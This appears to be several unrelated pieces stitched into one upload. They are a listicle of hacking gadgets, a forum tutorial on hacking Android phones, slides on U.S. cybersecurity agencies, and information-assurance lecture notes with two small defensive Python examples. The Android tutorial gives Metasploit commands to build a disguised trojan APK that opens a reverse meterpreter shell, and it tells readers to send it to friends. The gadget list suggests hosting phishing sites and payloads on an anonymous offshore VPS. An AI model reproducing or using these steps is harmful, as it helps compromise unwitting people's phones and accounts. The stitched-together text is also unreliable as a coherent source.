List of Affected Devices Technical Details Crazyradio USB Dongle

This document lists and describes 10 essential gadgets that hackers should try, including a mousejacking exploit antenna, GPUs for password cracking, small laptops like the GPD Pocket, Raspberry Pis, the USBarmory, VPS subscriptions, hacking tools from Hak5 like the USB Rubber Ducky, standard WiFi hacking adapters, long-range WiFi antennas, and hacking with drones like the Project Cuckoo drone.

Uploaded by Em Tadeo

10 Essential Gadgets Every Hacker Should Try

1. Mousejacking Exploit Antenna


In 2016, the security firm Bastille made headlines when it reported its research on
wireless keyboard and mouse vulnerabilities. Dubbed "mousejacking," these
vulnerabilities allow an attacker (up to 300 feet away) to take control of a target
computer without needing physical access. These attacks allow for remote keystroke
injection by letting penetration testers anonymously pair their device to a target
computer that is using popular wireless keyboard adapters (shown below).

This attack is made possible by keyboard vendors (Logitech and Dell) failing to
encrypt data transmissions between the keyboard and USB adapter or failing to
properly authenticate devices communicating with the adapter. It's been over two
years since the vulnerabilities were disclosed, but there are reportedly more than a
billion affected devices worldwide, as Logitech and Dell are extremely popular
manufacturers of wireless keyboards.

For more information on this attack, check out Bastille's official website for a list
of affected devices and technical details.

The "Crazyradio USB Dongle" used in these attacks is a 2.4 GHz bi-directional
transceiver which can send and receive radio telemetry. Essentially, this USB
dongle is capable of observing, recording, and injecting wireless radio waves.

2. GPUs for Password Cracking


A graphics processor (GPU) is a chip, usually embedded in a graphics card
attached to a computer's motherboard, designed to efficiently process images and
alter memory in smartphones, personal computers, and gaming consoles. GPUs
are responsible for all of the video and image rendering on our electronic devices.

Hackers repurpose GPU technologies and build dedicated "cracking rigs" to
enhance password brute-forcing attacks with Hashcat. This kind of usage is
demonstrated in Tokyoneon's "Hack 200 Online User Accounts in Less Than 2
Hours" article, where he compromised hundreds of Twitter, Facebook, and Reddit
accounts by using a GPU to crack hashes found in a leaked password database.

GeForce graphics cards are a great starting point for hackers who are considering
building a dedicated brute-force machine. At just $189, the GeForce GTX 1050 Ti is
a good starter GPU.

3. The World's Smallest Laptops


The GPD Pocket has been dubbed "the world's smallest laptop," which is an
interesting option for white hats and pentesters always on the go. It features the
Intel Atom X7, 1920 x 1080 resolution, and 8 GB of RAM packed into a small-sized
laptop that's only a bit larger than most modern smartphones (shown below).

Pocket-sized PCs are growing in popularity due to their small size, physical
keyboards, ability to handle high-performance games, and Intel CPUs which are
superior to ones found in Raspberry Pis and smartphones.

Pentesters can easily install a variety of Linux operating systems on this device
including Ubuntu, Kali Linux, and BlackArch in place of the default Windows 10.

If you're looking for a bit more power in a slimmer laptop, the latest GPD Pocket
2 features better hardware specs and is 50% thinner than the previous model.

4. The Latest Raspberry Pi


The Raspberry Pi 3 Model B+ was released this year featuring a slightly faster CPU,
upgraded Wi-Fi and Ethernet modules, and can be powered without a traditional
power adapter using the Ethernet port (with a PoE HAT).

Null Byte has covered how to build a hacking Raspberry Pi, use VNC to remotely
access it, and create a portable pentesting Pi box, to name just a few tutorials.
Using a Raspberry Pi as a hacking tool has been covered at length, so I'll move on.

5. The USB Armory

The USB Armory is a computer about the size of a USB flash drive designed to
deliver a number of advanced security features. It was built to support the
development of security software and applications while keeping power
consumption low. As per the developer's keynote at FSec 2016, the USB Armory can
be used for:

- file storage with advanced features such as automatic encryption, virus
  scanning, host authentication, and data self-destruct
- OpenSSH client and agent for untrusted hosts
- router for end-to-end VPN tunneling
- password manager with an integrated web server
- electronic wallet (e.g., Bitcoin wallet)
- authentication token
- portable penetration testing platform
- low-level USB security testing

It also has excellent support for Ubuntu, Debian, and Android operating systems.
For an in-depth look at the USB Armory, check out the official website and
documentation.

6. VPS Subscriptions

A virtual private server (VPS) is a computer we can control remotely from any
internet-connected device in the world. Adding a reliable VPS subscription to your
arsenal is essential for any penetration tester and professional security researcher.
From a remote VPS, penetration testers can:

- host payloads for hacking macOS and Windows 10
- securely sync files
- create IRC bots
- host phishing websites
- perform password brute-force reuse attacks
- host USB drop payloads
- use advanced Nmap scripts
- create server proxies
- create onion websites
- host Metasploit sessions

Our favorite for white hats and pentesters is BulletShield since it does not require
or request any personal info when registering or paying, offers offshore solutions,
and has a Tor-friendly website, among other things. Check out the full guide to
picking the right VPS below for more info.

7. Hak5 Gear
Hak5 is an award-winning podcast that offers immersive information security
training and renowned penetration testing gear. Below are some of the excellent
tools Hak5 has to offer.

The USB Rubber Ducky


The USB Rubber Ducky is Hak5's USB keystroke injection tool capable of executing
payloads at over 1,000 words per minute. It can be used to hack a macOS device in
less than 5 seconds, disable antivirus software, or social engineer someone into
plugging it into their computer.

Bash Bunny
The Bash Bunny is a multi-functional USB attack tool similar to the USB Rubber
Ducky. However, the Bash Bunny is a full-featured Linux operating system which
gives it a number of advantages over the USB Rubber Ducky such as carrying
multiple advanced payloads, emulating a combination of devices, and performing
numerous advanced attacks. Penetration testers with a need to take their physical
attacks to the next level will appreciate this one.

Packet Squirrel
The Packet Squirrel is a pocket-sized man-in-the-middle attack tool designed for
covert packet capturing and secure remote access to target networks. Ports on
this small network implant include USB and Ethernet.
LAN Turtle
The LAN Turtle is a covert penetration testing tool great for network intelligence
gathering, advanced surveillance, and man-in-the-middle attacks all available via a
graphical shell. It ships equipped with SIM (3G) functionalities and a modular
framework that allows hackers to very easily execute and automate advanced
network attacks.

WiFi Pineapples
The WiFi Pineapple and WiFi Pineapple Nano are excellent rogue access
point and Wi-Fi auditing devices. Their suite of Wi-Fi auditing tools is designed to
make reconnaissance, man-in-the-middle attacks, and hacking wireless networks
quick and painless. Best of all, all of these features can be accessed using any
phone or web browser via the easy-to-use graphical interface.

8. Standard Wi-Fi Hacking Adapter


Wi-Fi hacking is a popular topic among penetration testers. Our ability
to compromise wireless networks with ease is an essential skill. So a wireless
adapter is something you can't do without, preferably one that's Kali-compatible.
Some choices that are worth looking into include

9. Long-Range Wi-Fi Hacking Antenna


If standard Wi-Fi hacking antennas aren't getting the job done, increasing the
signal coverage and range with a bigger antenna will allow us to compromise
routers much further away.

The Tupavco TP512 Yagi Wi-Fi Directional Antenna has customer reviews reporting
up to 300 feet of range. Some reports online claim up to 1 mile of range where an
unobstructed line of sight to the target router is permitted. There are other
vendors selling similar Yagi products and bundles. For example, ALFA's Yagi
Antenna includes an ALFA hacking chipset and the necessary cable adapter.

10. Hacking with Drones


With drone racing rising in popularity over the last few years, these small
quadcopters are quickly becoming the DIY hacker's gadget of choice.

Project Cuckoo is the Watch Dogs-inspired pentesting drone created by the
hacker known as "Glytch." This 3D-printed drone features an attached WiFi
Pineapple Nano which allows it to perform man-in-the-middle attacks and inject
malicious JavaScript into Wi-Fi hotspots as well as stealthily sniff Wi-Fi activity
without connecting to the router.
In upcoming Null Byte articles, we'll be talking about building our own affordable
hacking drone and demonstrating all of the unique scenarios penetration testers
can utilize with such devices.

3D printers on Amazon (of decent quality) start at around $299. Add the price of
the materials, individual drone components, and a remote control — that's well
over $500 spent building a hacking drone from scratch. If you're looking for a
quicker solution or lack the patience to deal with the technical ins and outs of 3D
printing and drone building, there are alternatives.

The DJI Spark Drone is a small, lightweight drone that includes a remote control
for a total of $399. With up to 15 minutes of flight time, a range of up to 1.2 miles,
and an attached 12 MP 1080p video camera, this is possibly the best, most
affordable little drone currently on the market.

If your budget allows for a wider range of drones, the "DJI Mavic Drone" may be a
better option. It features a higher resolution camera, up to 2.4 miles of range, 8
GB of internal storage (for video recording), 3-axis mechanical gimbal (for
improved stability), and over 20 minutes of flight time.

Bonus: E-Books & Learning Materials


While e-books aren't physical gadgets, I thought this was worth mentioning as
every penetration tester should have a healthy supply of learning resources at their
disposal.

Null Byte is an excellent repository for learning how to use Metasploit as well as
how to hack macOS and Windows 10. However, e-books and certification exam
preparation cookbooks contain vast amounts of information. These materials are
often created by veteran pentesters with over a decade of hands-on professional
experience. Novice hackers who have prepared for any kind of ethical hacking
exam will tell you how valuable these learning materials can be.

A variety of learning materials can sometimes be found for free on websites like
"All IT eBooks." While some of these e-books are several years old, they still
contain relevant and useful information. Other (non-free) titles include:

- The Hacker Playbook 3: Practical Guide To Penetration Testing
- CompTIA Network+: Certification All-in-One Exam Guide, Seventh Edition
- CompTIA CySA+: Cybersecurity Analyst Certification All-in-One Exam Guide
- CEH: Certified Ethical Hacker Bundle, Third Edition (All-in-One)
- CompTIA PenTest+: Certification All-in-One Exam Guide
- CISSP: All-in-One Exam Guide, Eighth Edition
- Hash Crack: Password Cracking Manual
- Kali Linux Web Penetration Testing Cookbook: Identify, exploit, and
  prevent web application vulnerabilities with Kali, 2nd Edition

What Are Your Picks for Essential Hacking Gear?
We tried to compile a diverse list of hacking tools and gadgets intermediate
penetration testers might appreciate. If you're looking to explore weaponized
hacking drones, extend the range of your Wi-Fi router hacks, or dive deeper into
password cracking, the featured gadgets should provide a good starting point.

This list of hacker gear might not appeal to everyone, however. Did we miss any
noteworthy or new gizmos hackers should know about? Be sure to leave a
comment below with your picks for the essential gadgets hackers should try!

Hack Androids using Kali

Hello Hackers! Welcome to my 2nd Post:


This is a tutorial explaining how to hack Android phones with Kali.
I can't see any tutorials explaining this hack/exploit, so I made one.
(Still, you may already know about this.)

Step 1: Fire Up Kali

- Open a terminal, and make a Trojan .apk
- You can do this by typing: msfpayload android/meterpreter/reverse_tcp
  LHOST=192.168.0.4 R > /root/Upgrader.apk (replace LHOST with your own IP)
- You can also hack Android on WAN, i.e. through the Internet, by using your
  public/external IP in the LHOST and by port forwarding (ask me about port
  forwarding if you have problems in the comment section)

Step 2: Open Another Terminal

- Open another terminal while the file is being produced.
- Load the Metasploit console by typing: msfconsole

Step 3: Set Up a Listener

- After it loads (it will take time), load the multi-handler exploit by typing:
  use exploit/multi/handler
- Set up a (reverse) payload by typing: set payload android/meterpreter/reverse_tcp
- To set LHOST type: set LHOST 192.168.0.4 (Even if you are hacking on WAN,
  type your private/internal IP here, not the public/external)

Step 4: Exploit!

- At last type: exploit to start the listener.
- Copy the application that you made (Upgrader.apk) from the root folder to
  your Android phone.
- Then share it by uploading it to Dropbox or any sharing website
  (like: www.speedyshare.com).
- Then send the link that the website gave you to your friends and exploit
  their phones (Only on LAN, but if you used the WAN method then you can
  use the exploit anywhere on the Internet)
- Let the victim install the Upgrader app (as he would think it is meant to
  upgrade some features on his phone)
- However, the option allowing installation of apps from Unknown Sources
  should be enabled (if not) from the security settings of the Android
  phone to allow the Trojan to install.
- And when he clicks Open...

Step 5: BOOM!

There comes the meterpreter prompt:

EECS 710: Information Security and Assurance

Contents
- Department of Justice - CCIPS
- Department of Justice - FBI
- National Security Agency - NSA
- Department of Homeland Security
- CMU/SEI CERT Coordination Center
- Conclusion

Department of Justice - CCIPS

* Computer Crime and Intellectual Property Section -
  http://www.justice.gov/criminal/cybercrime/
* CCIPS prevents, investigates, and prosecutes computer crimes.
* Goal is to protect Intellectual Property (IP).
* Case highlights include the U.S. v. Microsoft antitrust case and Authors
  Guild, Inc. v. Google, Inc.
* Provides an IP Victim Guide on how to report intellectual property crimes as
  well as a manual for prosecuting IP crimes and computer crimes.
* Leadership: John Lynch, Chief, Computer Crime & Intellectual Property
  Section.

Department of Justice - FBI

* InfraGard program developed in 1996 as a partnership between the private and
  public sectors to protect U.S. critical infrastructure and resources.
* InfraGard works well since most infrastructure components like utility
  companies, transportation, telecom, water, and food suppliers are
  privately owned.
* InfraGard began with a focus on cyber crime but now encompasses
  computer, physical and other security breaches.
* An FBI agent serves as coordinator between companies to evaluate threats
  and impacts on their respective companies.
* Companies use FBI resources such as an encrypted website, webmail,
  listservs, and message boards to communicate and share case information.
* FBI provides an Internet Crime Complaint Center (IC3) targeting internet
  crime investigations: http://www.ic3.gov/default.aspx
* IC3 is a partnership between the FBI and the National White Collar Crime
  Center (NW3C).
* IC3 handles complaints regarding IP rights, computer intrusions, economic
  espionage, online extortion, internet money laundering, identity theft, and
  more.
* IC3 offers Internet Crime Prevention Tips and Schemes as well as a FAQ
  and Consumer Alerts.
* IC3 website allows visitors to file a complaint online to the FBI and have
  their claim investigated.
National Security Agency - NSA

* The National Security Agency (NSA) operates an Information Assurance
  Directorate (IAD) to protect National Security Information Systems (any
  system critical to military or intelligence activities).
* The IA program provides guidance to businesses as well as the TEMPEST
  Certification Program which tests and certifies products.
* IA features an Academic Outreach program which focuses on promoting
  higher education and research in IA to protect the nation’s infrastructure.
* The IA provides a Business Affairs Office and has many partnerships with
  private industry.
* Provides the Commercial COMSEC Evaluation Program (CCEP) for product
  development to meet IA standards.

Department of Homeland Security

* The National Protection and Programs Directorate (NPPD) was developed to
  protect and enhance the resilience of the nation’s physical and cyber
  infrastructure.
* NPPD has four divisions: Federal Protective Service (FPS), Office of
  Cybersecurity and Communications (CS&C), Office of Infrastructure
  Protection (IP), and US-VISIT.
* The National Infrastructure Protection Plan (NIPP) is operated by DHS to
  protect the nation’s critical infrastructure by providing a framework for
  security efforts.
* Mission is to lead the federal government in securing civilian and industry
  computer systems as well as government and critical infrastructure
  systems.
* DHS created the Stop.Think.Connect campaign in 2009 for public
  awareness of cyber threats and to provide resources and effective tips for
  preventing attacks.
* Obama designated the month of October as National Cyber Security
  Awareness Month (NCSAM) to promote awareness of cyber threats.
* Stop.Think.Connect provides a toolkit with tip sheets, presentations,
  videos, press releases, fact sheets, and social media contacts for
  educators, industry, and both young and older
* US-CERT (United States Computer Emergency Readiness Team) provides
  information and tips for cyber security as well.
* US-CERT’s mission is to improve the nation’s cybersecurity posture,
  coordinate cyber information sharing, and proactively manage cyber risks
  to the nation while protecting the constitutional rights of Americans.
* US-CERT provides a feed of current industry activities relating to cyber
  security as well as recent vulnerabilities and methods to mitigate the
  vulnerabilities.
* US-CERT provides a hotline and 24x7 operations center to respond to
  security incidents as well as provide technical assistance and notifications.
* US-CERT partners with the private sector, academic institutions, federal
  agencies and the Information Sharing and Analysis Centers (ISACs).
* The National Security Telecommunications Advisory Committee (NSTAC)
  was created by the DHS to provide the U.S. Government the best possible
  industry advice in the areas of the availability and reliability of
  telecommunications services.
* The NSTAC has been around for over 30 years with partnerships in the
  telecommunications and aerospace companies.
* Addresses such issues as the convergence of traditional and broadband
  networks, the changing global threat environment, and the continuing
  global expansion of provider and user communities.
* Five key themes: strengthening national security, enhancing cybersecurity,
  maintaining the global communications infrastructure, assuring
  communications for disaster response, and addressing critical
  infrastructure interdependencies.

CMU/SEI CERT Coordination Center

* The CERT Coordination Center is located at Carnegie Mellon University and
  studies internet security vulnerabilities, researches long-term changes in
  networked systems, and develops information and training for improved
  security.
* CERT.org offers both training courses and certifications for professionals
  interested in cyber security.
* CERT.org will analyze programming code that is submitted to identify
  vulnerabilities in the early stages of development, saving time and effort
  for programmers.
* CERT.org also provides information on securing network systems as well
  as managing risk and governance of organizational security.
* Similar to the DHS CERT team (US-CERT), CERT.org also provides a response
  team available to assist with security issues.

Conclusion

* There are many agencies and websites, both government and private sector,
  that provide valuable resources for cyber security.
* Learn how to use the tools provided and contact the agencies in the event
  of a cyber crime.

An Introduction to Information Assurance

Reading Assignment

- Read section 3 of the FAQ: http://www.w3.org/Security/Faq/
- CERT is a coordination center for Internet security operated by Carnegie
  Mellon. Read the CERT article on security:
  http://www.cert.org/encyc_article/tocencyc.html
- This course is part of the SCU Information Assurance curriculum which was
  recently certified by the Committee on National Security Systems of the
  National Security Agency as meeting the standards of the National INFOSEC
  Education and Training Program.

4011 Certificate Requirements

- BSCE: AMTH 387, COEN 250; 12 units from COEN 150, 178, 252, 253, 350, 351;
  and approved senior design project.
- MSCE: AMTH 387, COEN 250, 252, 253, 351 and either COEN 350, 254, or 352.

Terminology Overview
-Attacks, Services and Mechanisms
-Security Services
-Threats, Attacks and Vulnerabilities
-Security Policies and Mechanisms for Defense
-Readings, standards, etc.

Definitions

- Security Attack: Any action that compromises the security of information.
- Security Mechanism: A mechanism that is designed to detect, prevent, or
  recover from a security attack.
- Security Service: A service that enhances the security of data processing
  systems and information transfers. A security service makes use of one or
  more security mechanisms.

Security Services (Goals)

* Confidentiality – concealment of information or resources. Includes whether
  or not data exists. Implies “authorization” so that only authorized people
  can access confidential data.
* Integrity – the trustworthiness and the correctness of data or resources.
  Usually in terms of preventing improper or unauthorized change.
  - Can have several types of integrity: data integrity and origin integrity
    (was the email spoofed?)
  - Two types of integrity services: prevention and detection.
* Availability – the ability of authorized entities to use the information or
  resource. Denial of service attacks inhibit this service.
* CIA: Confidentiality, Integrity, Availability
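The integrity service as a detection mechanism, shown with a message authentication code (HMAC-SHA256). This is an added example rather than material from the slides; the shared key, the "attacker key", and the order messages are constructed for illustration. It covers both flavours of integrity named above: data integrity (a modified message no longer verifies) and origin integrity (a message tagged by someone who never held the shared key, i.e. a spoofed origin, no longer verifies either).

```python
"""Integrity as detection: an HMAC tag lets the receiver detect both
modification (data integrity) and spoofing (origin integrity).
Added example; the key and messages below are constructed."""
import hashlib
import hmac
import os


def make_tag(key: bytes, message: bytes) -> bytes:
    """Compute the authentication tag the sender attaches to a message."""
    return hmac.new(key, message, hashlib.sha256).digest()


def verify(key: bytes, message: bytes, tag: bytes) -> bool:
    """Recompute the tag and compare in constant time (avoids timing leaks)."""
    expected = make_tag(key, message)
    return hmac.compare_digest(expected, tag)


def check_scenarios(shared_key: bytes, attacker_key: bytes) -> dict:
    """Run the three cases from the slide: authentic, modified, fabricated."""
    order = b"BUY 100 shares ACME"  # constructed sample message
    tag = make_tag(shared_key, order)

    # 1. Untouched message from the legitimate sender verifies.
    authentic = verify(shared_key, order, tag)

    # 2. Modification attack: body changed in transit, tag left as-is.
    #    The receiver detects the data-integrity violation.
    altered = verify(shared_key, b"BUY 900 shares ACME", tag)

    # 3. Fabrication / spoofed origin: the attacker does not hold the shared
    #    key, so any tag they produce fails the origin-integrity check.
    forged_msg = b"SELL 100 shares ACME"
    forged = verify(shared_key, forged_msg, make_tag(attacker_key, forged_msg))

    return {"authentic": authentic, "altered": altered, "forged": forged}


if __name__ == "__main__":
    print(check_scenarios(os.urandom(32), os.urandom(32)))
```

Note that a MAC is a detection service only: it cannot stop the modification from happening, it guarantees that the receiver notices it. Prevention would be a separate mechanism (for example, access control on the channel).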


Vulnerabilities, Threats and Attacks

- A vulnerability is a weakness in the system that might be exploited to
  cause loss or harm (and a violation of security services).
- A threat is a potential violation of security. Security services counter
  threats.
- An attack is the actual attempt to violate security. It is the
  manifestation of the threat.

Classifying Communication Attacks

Types of Attacks

- Interruption: This is an attack on availability
- Interception: This is an attack on confidentiality
- Modification: This is an attack on integrity
- Fabrication: This is an attack on integrity

Additional Threats/Attacks

- Repudiation of origin – a false denial that an entity sent or created
  something (I didn’t send that order to buy Enron stock the day before it
  crashed). Attack on integrity.
- Denial of receipt – a false denial that an entity received some information
  or message (I didn’t receive the diamond shipment). Attack on integrity and
  availability.
- Denial of Service – long-term inhibition of information or service. Attack
  on availability.

Passive and Active Threats

- Passive: release of message contents, traffic analysis
- Active: masquerade, replay, modification of message contents, denial of
  service
Security Policy and Mechanisms

A security policy is a statement of what is and is not allowed.

A security mechanism is a method, tool, or procedure for enforcing security
policy.

These should clearly be separate things.

Policy and Mechanism Example

Policy – only the systems administrator is allowed to access the password
file, and then only in encrypted form.

Mechanism – the password file is not stored in clear text, but only in
encrypted form with algorithm XYZ. The O.S. checks the access authorization
of any process attempting to read the password file immediately before the
access; whenever access is denied, that attempt is recorded in a log of
suspicious activity.

Security Mechanisms

Prevention, Detection, Recovery

Prevention:
- Encryption
- Software controls (DB access limitations, operating system process
  protection)
- Enforced policies (frequent password change)
- Physical controls

Detection: Intrusion detection systems (IDS)

Prevention Mechanisms

Adequate prevention means that an attack will fail. Prevention usually
involves mechanisms that the user cannot override. Prevention mechanisms are
often cumbersome and do not always work perfectly, or fail because they are
circumvented.

Passwords are a prevention mechanism to prevent unauthorized access. They
fail when the password becomes known to a person other than the owner.

Detection Mechanisms

Detection is used when an attack cannot be prevented, and it also indicates
the effectiveness of prevention measures.

The goal is to determine that an attack is underway or has occurred and
report it.

Audit logs are detection mechanisms. When you log into the design center’s
Unix servers, it gives you the IP address of the last successful login.
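The policy/mechanism split from the "Policy and Mechanism Example" and the audit-log detection idea from this section, worked through in one added example (not from the slides). The policy is the one the slide states: only the systems administrator may read the password file, and only its encrypted form. The mechanism is a reference-monitor style check run immediately before each access that writes every denial to a suspicious-activity log; a second routine then reviews that log, which is the detection step. Principal names, the `.enc` naming convention for the encrypted file, and the log line format are all constructed assumptions for this example.

```python
"""Policy kept separate from mechanism, plus log-based detection.
Added example; names, file paths and log format are constructed."""
from collections import Counter
from datetime import datetime, timezone

# POLICY: a statement of what is allowed (resource -> principals who may read it).
# Changing the policy never requires changing the enforcement code below.
POLICY = {
    "/etc/shadow.enc": {"sysadmin"},   # constructed path for the encrypted file
}

# The "log of suspicious activity" from the slide; in a real system this is an
# append-only file or a remote syslog, not an in-memory list.
SUSPICIOUS_LOG: list[str] = []


def _now() -> str:
    return datetime.now(timezone.utc).isoformat(timespec="seconds")


def read_resource(principal: str, resource: str) -> bool:
    """MECHANISM: authorization check immediately before the access.
    Returns True if the read may proceed; every denial is logged."""
    # "only in encrypted form": a request for the plaintext name is refused
    # regardless of who asks, and is itself suspicious.
    if not resource.endswith(".enc"):
        SUSPICIOUS_LOG.append(
            f"{_now()} DENY {principal} {resource} reason=plaintext-request")
        return False
    if principal not in POLICY.get(resource, set()):
        SUSPICIOUS_LOG.append(
            f"{_now()} DENY {principal} {resource} reason=not-authorized")
        return False
    return True  # the caller would now open the encrypted file


def flag_repeat_offenders(log_lines, threshold: int = 3) -> dict[str, int]:
    """DETECTION: review the audit log and report principals denied at least
    `threshold` times. Log line format (constructed):
    <timestamp> DENY <principal> <resource> reason=<why>"""
    denials = Counter()
    for line in log_lines:
        parts = line.split()
        if len(parts) >= 4 and parts[1] == "DENY":
            denials[parts[2]] += 1
    return {p: n for p, n in denials.items() if n >= threshold}


def simulate() -> dict[str, int]:
    """Drive a few accesses and return what the detection step flags."""
    SUSPICIOUS_LOG.clear()
    read_resource("sysadmin", "/etc/shadow.enc")     # allowed, not logged
    read_resource("sysadmin", "/etc/shadow")         # plaintext: denied
    for _ in range(3):
        read_resource("mallory", "/etc/shadow.enc")  # not authorized: denied x3
    return flag_repeat_offenders(SUSPICIOUS_LOG)


if __name__ == "__main__":
    print(simulate())  # {'mallory': 3}
    for line in SUSPICIOUS_LOG:
        print(line)
```

The point of the layout is the one the slide makes: `POLICY` says what is allowed, `read_resource` enforces it, and `flag_repeat_offenders` only reads the log. Swapping in a different policy (another administrator, a different file) touches the first table only; tightening detection (a lower threshold, alerting on any plaintext request) touches the last function only.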

Recovery

Recovery has several aspects. The first is to stop an attack and repair the
damage.

Another is to trace the evidence back to the attacker and discover the
identity of the attacker (this could result in legal retaliation).

Yet another aspect is to determine the vulnerability that was exploited and
fix it or devise a way of preventing a future attack.

Example: Private Property

Prevention: locks at doors, window bars, walls around the property

Detection: stolen items are missing, burglar alarms, closed circuit TV

Recovery: call the police, replace stolen items, make an insurance claim …

Example: E-Commerce

Prevention: encrypt your orders, rely on the merchant to perform checks on
the caller, don’t use the Internet (?) …

Detection: an unauthorized transaction appears on your credit card statement

Recovery: complain, ask for a new card number, etc.

Footnote: Your credit card number has not been stolen. Your card can be
stolen, but not the number. Confidentiality is violated.

Problems with Security Mechanisms

Laws and customs - is it legal? It might not be legal to retaliate against an
attacker.

Is it acceptable practice? How many hoops do we have to jump through to
authenticate?

Is it convenient? Users with security needs are often not aware of
vulnerabilities and will not put up with excessive cost and inconvenience.

Other Terminology

CompuSec: computer security (protect computers and the information in them)

ComSec: communication security (protect information as it is transmitted)

OpSec: operations security (security policies and procedures)
